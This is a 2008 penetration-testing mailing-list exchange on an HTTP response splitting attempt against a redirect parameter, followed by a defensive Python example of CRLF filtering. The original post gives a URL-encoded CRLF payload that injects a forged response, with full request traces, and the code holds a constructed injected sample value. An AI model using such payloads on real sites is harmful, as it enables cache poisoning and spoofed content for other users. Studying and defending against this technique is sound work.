Penetration Testing
mailing list archives
Re: Is there a HTTP Respone Splitting Flaw?
From: "Gleb Paharenko" <gpaharenko () gmail com>
Date: Wed, 30 Apr 2008 10:42:39 +0300
Hi.
Service is vulnerable to HTTP splitting in case it does not filter
control characters in the output. Splitting can be utilized in several
attack vectors, and cache poisoning is only one of them. When I was
researching the article of Amit Klein, I was able to easily reproduce
cache poisoning with Apache, however failed with Squid. My advice is
to emulate the attack in a lab environment and then try it in the wild. BTW:
fresh Squid has some protection patches against cache poisoning.
Headers can be normalized by the upstream proxy, so you should be
aware of it. You can also cross-post your question to the more specific
webappsec mailing list.
2008/4/29 <bin4ry () theknetgroup org>:
Hi together,
I'm new to this community as well as to pen-testing. I've already done some jobs for smaller companies and
IT infrastructures.
Now I have to pen-test a website. I need to perform a black-box test and I've already found some XSS and some
SQL injection bugs which I've reported to the site admin.
Now I believe that there's an HTTP response splitting flaw as well.
I found this suspicious resource:
foo.bar/accept?dest=/xy/z
This looks like a redir script, right? So this is what I get:
GET foo.bar/accept?dest=/xy/z HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive
HTTP/1.x 302 Moved Temporarily <<<<<< looks suspicious
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:09:42 GMT
Location: foo.bar/xy/z <<<<<<<
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Runtime: 0.39293
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from prx-deka-02.f.ddk
----------------------------------------------------------
GET /xy/z HTTP/1.1 <<<<< that's it, right?
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "e7346ba9885de32fe8d51358b8a409af"
HTTP/1.x 304 Not Modified <<<<< comes straight from a squid proxy
Via: A_PROXY
Date: Fri, 25 Apr 2008 12:09:42 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "e7346ba9885de32fe8d51358b8a409af"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS from A_PROXY
Till now everything looks like a response splitting flaw. That's why I pass this one to $dest:
/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E
Which is:
/xy/z
HTTP/1.1 200 OK
Content-Type: text/html
Pragma: no-cache
Last-Modified: Tue, 15 Nov 2055 12:45:26 GMT
Content-Length: 36
<html>HTTP Response Splitting</html>
So, again our HTTP traffic, now with an injected HTTP header:
GET /accept?dest=/xy/z/4%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aPragma:%20no-cache%0d%0aLast-Modified:%20Tue,%2015%20Nov%202055%2012:45:26%20GMT%0d%0aContent-Length:%2036%0d%0a%3Chtml%3EHTTP%20Response%20Splitting%3C/html%3E HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Pragma: no-cache
Proxy-Connection: keep-alive
HTTP/1.x 302 Moved Temporarily
Via: A_PROXY
Connection: close
Proxy-Connection: close
Date: Fri, 25 Apr 2008 12:07:47 GMT
Location: foo.bar/de/xy/z
Content-Type: text/html; charset=utf-8
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Cache-Control: no-cache, private
X-Powered-By: Servlet/2.4 JSP/2.0
X-Cache: MISS from A_PROXY
----------------------------------------------------------
GET /xy/z HTTP/1.1
Host: foo.bar
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
If-None-Match: "78ad90f3569fd7b31ad763f3f52e2c46"
HTTP/1.x 304 Not Modified
Via: 1.0 A_PROXY
Date: Fri, 25 Apr 2008 12:07:48 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.8d
Etag: "78ad90f3569fd7b31ad763f3f52e2c46"
Cache-Control: private, max-age=0, must-revalidate, private
X-Cache: MISS A_PROXY
As you can see, the injected header won't be matched to the HTTP request from the redir script.
I tried several CRLF types: %0d%0a, %0a%0a and %0a, but as we can see this is a Linux box, therefore %0d%0a should
work.
There's a Squid between me and foo.bar. The whitepaper from Sanctum says that Squid has a packet boundary approach
and messages are read as packets, and therefore injected headers may need to be padded.
Can someone help me out?
Thx
P.S.: And another question. Since I am not really familiar with response splitting, I'd like to ask you whether the
risk of response splitting is always present when a script utilizes user input to form a new address which is the
target of a redirection script, which manifests in an HTTP 302 header from the server?
Thanks and greetings to the community from Germany.
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
--
Best regards.
Gleb Pakharenko.
http://gpaharenko.livejournal.com
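As an added example that is not code from either poster, the Python below shows the condition Gleb names ("does not filter control characters in the output") from the defender's side. It pairs a redirect handler that concatenates a decoded, user-supplied destination into the Location header with a hardened version that rejects CR, LF and NUL, and adds a helper that counts status lines the way a proxy or cache would perceive the byte stream. The handler, the foo.bar host in the Location value and the injected sample destination are all constructed for illustration; the check runs on the decoded value because that is the form in which the application's framework hands the parameter to the redirect code.

```python
"""Added example: CR/LF (response splitting) check for a redirect target.

Not code from the thread; the handler, host name and sample values are
constructed for illustration.
"""
from urllib.parse import unquote

# Characters that end a header line or the whole header block if they reach
# the wire unfiltered. NUL is included because some stacks truncate on it.
CONTROL_CHARS = frozenset("\r\n\x00")

# Constructed sample values (not the thread's payload):
SAFE_DEST = "/xy/z"
INJECTED_DEST = ("/xy/z%0d%0a%0d%0a"
                 "HTTP/1.1%20200%20OK%0d%0a"
                 "Content-Length:%200%0d%0a%0d%0a")


def decode_dest(raw_dest: str) -> str:
    """Percent-decode the query value the way a web framework does before the
    application sees it, so %0d%0a and %0a are inspected in decoded form."""
    return unquote(raw_dest)


def has_header_injection(raw_dest: str) -> bool:
    """True if the decoded redirect target contains CR, LF or NUL."""
    return any(ch in CONTROL_CHARS for ch in decode_dest(raw_dest))


def build_redirect(raw_dest: str) -> bytes:
    """Vulnerable pattern: the decoded, user-controlled value is concatenated
    into the Location header without any filtering."""
    dest = decode_dest(raw_dest)
    return (
        "HTTP/1.1 302 Moved Temporarily\r\n"
        f"Location: http://foo.bar{dest}\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "\r\n"
    ).encode("utf-8")


def build_redirect_safe(raw_dest: str) -> bytes:
    """Hardened form: refuse the request outright when control characters are
    present instead of trying to strip them."""
    if has_header_injection(raw_dest):
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return build_redirect(raw_dest)


def count_status_lines(raw_response: bytes) -> int:
    """Count status lines in a byte stream, which is how a proxy or cache
    perceives it: one is a normal response, two means it was split."""
    return sum(1 for line in raw_response.split(b"\r\n")
               if line.startswith(b"HTTP/1."))


if __name__ == "__main__":
    for label, dest in (("safe", SAFE_DEST), ("injected", INJECTED_DEST)):
        print(label, "unfiltered:", count_status_lines(build_redirect(dest)),
              "checked:", count_status_lines(build_redirect_safe(dest)))
```

Rejecting with a 400 is preferred over stripping the characters, because a value that survives stripping can still be dangerous after a second decoding step elsewhere in the stack. The same decode-then-inspect order is what to apply when reviewing a redirect script of the kind asked about in the thread: the risk is present exactly when the decoded value can reach a header with those characters intact.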